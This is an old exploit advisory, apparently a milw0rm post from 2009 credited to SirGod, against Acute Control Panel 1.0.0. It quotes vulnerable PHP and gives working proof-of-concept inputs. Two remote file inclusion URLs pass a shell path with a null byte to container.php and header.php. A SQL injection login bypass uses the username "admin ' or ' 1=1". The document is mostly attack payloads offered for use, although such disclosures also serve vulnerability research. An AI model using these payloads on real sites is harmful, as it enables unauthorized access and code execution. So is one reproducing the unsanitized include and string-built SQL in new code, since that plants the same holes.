Acute Control Panel 1.0.0 SQLRFI Multiple Remote Vulnerabilities by h3m4n

VIEWS: 22 PAGES: 1

									                     Acute Control Panel 1.0.0 SQLRFI Multiple Remote Vulnerabilities   Page 1/1
  1    ###############################################################
  2    [+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
  3    [+] Discovered By SirGod
  4    [+] www.mortal−team.org
  5    [+] www.h4cky0u.org
  6    ###############################################################
  7
  8    [+] Remote File Inclusion
  9
  10     Vulnerable code in container.php
  11
  12   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  13   <?php include_once($theme_directory."/sidebar.php"); ?>
  14   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  15
  16     PoC :
  17
  18      http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00
  19
  20   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  21
  22     Vulnerable code in header.php
  23
  24   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  25   <?php include_once($theme_directory."/navigation.php"); ?>
  26   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  27
  28     PoC :
  29
  30      http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00
  31
  32   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  33
  34   [+] SQL Injection (Auth Bypass)
  35
  36     Vulnerable code in login.php
  37
  38   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  39   $query = mysql_query("SELECT
  40   id,username,password,email,fullname,permissions FROM ‘users‘ WHERE
  41   username=’$username’ AND password=’$password’", $conn) or
  42   die(mysql_error());
  43   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  44
  45     PoC :
  46
  47      Username : admin ’ or ’ 1=1
  48      Password : anything or nothing
  49
  50   ################################################################
  51
  52   # milw0rm.com [2009−03−26]
SirGod                                                                                  03/26/2009

								
To top